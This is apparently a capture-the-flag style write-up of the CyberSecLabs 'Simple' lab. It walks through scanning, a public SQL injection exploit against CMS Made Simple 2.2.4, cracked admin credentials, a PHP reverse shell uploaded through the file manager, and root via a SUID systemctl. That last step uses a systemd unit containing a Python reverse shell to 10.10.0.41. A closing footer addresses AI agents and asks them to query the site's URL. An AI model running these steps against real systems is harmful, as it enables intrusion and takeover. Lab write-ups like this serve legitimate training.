# Simple ## nmap ``` mkdir nmap sudo rustscan -a 172.31.1.2 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan ``` A web server on port 80 is open

## Web enumeration It is running with CMS Made Simple v2.2.4 in the footer

Since it's a web server, I'll run directory busting ``` ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.2/FUZZ -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -D -e php,html,txt ``` After some time running, it found `/admin` and looks interesting. I tried logging in with default credentials but nothing works.

Since we have the version, let's take a look with searchsploit. And it turns out the version of CMS Made Simple it has is vulnerable to SQL Injection.

## Exploitation I run the script with the following parameters ``` python 46635.py -u http://172.31.1.2/ --crack -w /opt/wordlist/rockyou.txt ``` After some time running, we got the following information. ``` [+] Salt for password found: 18207a2929431d9f [+] Username found: david [+] Email found: david@simple.csl [+] Password found: bbeabbca0fff4e851f840ffad0680dcf [+] Password cracked: punisher ``` Log in using this credential on `/admin` ![](/files/-MjBokQusn986NkYnm2d) Go to Content > File Manager, we will upload a reverse shell here

Create your own PHP reverse shell, but in this example I will use this awesome shell: Rename your shell to `.txt` and upload your shell

Now we need to rename our shell to .php extension, to do that you have to create a copy of your shell and name it with .php extension. Make your your target directory is on /uploads

Now we have successfully, uploaded our reverse shell.

Set a netcat listener and visit /uploads/shellname.php. And you should received your shell right away.

## Privilege Escalation Let's transfer linpeas.sh to target machine

Transfer the bash script with `wget`

Run `linpeas.sh`

The binary `systemctl` has `suid` flag, we can use this to gain root shell.

Create shell.service in any writable folder with the following content, and edit the IP Address and port accordingly. ``` [Service] Type=oneshot ExecStart=/bin/sh -c "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.0.41\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'" [Install] WantedBy=multi-user.target ``` Create a softlink with the file you have created.

Set a netcat listener, and run the following command to trigger the exploit ``` systemctl start shell.service ``` Sweet, now you're root! :D

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://psdon.gitbook.io/hackworld/writeup/cyberseclab/simple.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.